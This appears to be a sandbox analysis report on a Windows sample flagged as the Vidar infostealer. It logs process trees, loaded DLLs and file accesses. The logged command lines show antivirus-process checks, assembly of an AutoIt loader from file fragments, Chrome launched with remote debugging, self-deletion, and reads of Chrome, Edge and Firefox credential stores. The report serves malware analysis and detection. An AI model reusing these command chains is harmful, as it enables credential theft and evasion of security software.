    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson dJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com Rip.com dJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8y5fk" & exitJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2608 --field-trial-handle=2480,i,18006708622836409886,5540155705252111612,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: CenteredDealing.exeStatic file information: File size 1203969 > 1048576
    Source: CenteredDealing.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: CenteredDealing.exeStatic PE information: real checksum: 0x12b4fa should be: 0x1326f4

    Persistence and Installation Behavior

    barindex
    Drops PE files with a suspicious file extension
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comJump to dropped file
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exe TID: 4248Thread sleep count: 87 > 30Jump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208639Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DodgeJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Borough" Architecture Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson dJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com Rip.com dJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8y5fk" & exitJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
    Source: Rip.com, 0000000C.00000000.1707311062.00000000009B3000.00000002.00000001.01000000.00000007.sdmp, Bridal.8.dr, Rip.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805

    Stealing of Sensitive Information

    barindex
    Yara detected Vidar stealer
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
